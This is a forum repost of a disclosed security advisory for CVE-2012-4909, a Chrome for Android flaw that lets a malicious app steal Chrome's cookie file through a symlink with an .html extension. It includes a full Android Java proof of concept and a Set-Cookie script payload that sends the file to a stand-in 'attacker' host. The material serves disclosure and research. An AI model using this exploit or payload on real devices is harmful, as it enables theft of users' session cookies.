Jump to content
boogy

Chrome For Android Cookie Theft

By boogy, in Exploituri

Recommended Posts

boogy Newbie

boogy

Posted
Posted

CVE Number: CVE-2012-4909

Title: Chrome for Android - Cookie theft from Chrome by malicious Android app

Affected Software: Confirmed on Chrome for Android v18.0.1025123

Credit: Takeshi Terada

Issue Status: v18.0.1025308 was released which fixes this vulnerability

Overview:

Symbolic links can be used for spoofing Content-Type of local files.

It enables malicious Android apps to steal Chrome's Cookie file.

Details:

When a local URI (file:///) of symlink is given to Chrome for Android

(v18.0.1025123), Chrome resolves symlink and load the content of the file

that the symlink is pointing to.

At the time of loading, Chrome does MIME sniffing by the extension of the

symlink, rather than that of the actual file which symlink is pointing to.

This behavior can be used for deluding Chrome into thinking that the Chrome's

private file (Cookie file) is HTML. When Chrome renders the Cookie file as HTML,

JavaScript in the Cookie file is executed.

Whole steps to steal Chrome's Cookie file are described below:

1. A malicious app create a symlink pointing to Chrome's Cookie file. The

extension of the symlink should be "html", which is a simple trick for

spoofing Content-Type.

2. The malicious app forces Chrome to load attacker's Web page. The Web page

sets a crafted Cookie which contains malicious HTML+JavaScript to steal

the whole content of the Cookie file:

Set-Cookie: x=<img><script>document.images[0].src='http://attacker/?'

+encodeURIComponent(document.body.innerHTML)</script>;

expires=Tue, 01-Jan-2030 00:00:00 GMT

The Cookie is stored in the Cookie file of Chrome.

3. The malicious app makes Chrome load the local URI of the symlink.

Then Chrome follows the symlink and renders the Cookie file as HTML,

because the extension of the URI (symlink) is "html".

It results in the execution of the attacker's JavaScript code that is

injected in the Cookie file. Attacker-supplied JavaScript read the whole

content of the Cookie file and send it to the attacker's server.

Proof of Concept:


package jp.mbsd.terada.attackchrome1;

import android.app.Activity;
import android.os.Bundle;
import android.util.Log;
import android.content.Intent;
import android.net.Uri;

public class Main extends Activity {
// TAG for logging.
public final static String TAG = "attackchrome1";

// Cookie file path of Chrome.
public final static String CHROME_COOKIE_FILE_PATH =
"/data/data/com.android.chrome/app_chrome/Default/Cookies";

// Temporaly directory in which the symlink will be created.
public final static String MY_TMP_DIR =
"/data/data/jp.mbsd.terada.attackchrome1/tmp/";

// The path of the Symlink (must have "html" extension)
public final static String LINK_PATH = MY_TMP_DIR + "cookie.html";

@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
doit();
}

// Method to invoke Chrome.
public void invokeChrome(String url) {
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
intent.setData(Uri.parse(url));
startActivity(intent);
}

// Method to execute OS command.
public void cmdexec(String[] cmd) {
try {
Runtime.getRuntime().exec(cmd);
}
catch (Exception e) {
Log.e(TAG, e.getMessage());
}
}

// Main method.
public void doit() {
try {
// Create the symlink in this app's temporary directory.
// The symlink points to Chrome's Cookie file.
cmdexec(new String[] {"/system/bin/mkdir", MY_TMP_DIR});
cmdexec(new String[] {"/system/bin/ln", "-s", CHROME_COOKIE_FILE_PATH, LINK_PATH});
cmdexec(new String[] {"/system/bin/chmod", "-R", "777", MY_TMP_DIR});

Thread.sleep(1000);

// Force Chrome to load attacker's web page to poison Chrome's Cookie file.
// Suppose the web page sets a Cookie as below.
// x=<img><script>document.images[0].src='http://attacker/?'
// +encodeURIComponent(document.body.innerHTML)</script>;
// expires=Tue, 01-Jan-2030 00:00:00 GMT
String url1 = "http://attacker/set_malicious_cookie.php";
invokeChrome(url1);

Thread.sleep(10000);

// Force Chrome to load the symlink.
// Chrome renders the content of the Cookie file as HTML.
String url2 = "file://" + LINK_PATH;
invokeChrome(url2);
}
catch (Exception e) {
Log.e(TAG, e.getMessage());
}
}
}

Timeline:

2012/08/06 Reported to Google security team

2012/09/12 Vender announced v18.0.1025308

2013/01/07 Disclosure of this advisory

Recommendation:

Upgrade to the latest version.

Reference:

Chrome Releases: Chrome for Android Update

https://code.google.com/p/chromium/issues/detail?id=141889

Source

Chrome For Android Cookie Theft - CXSecurity WLB

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...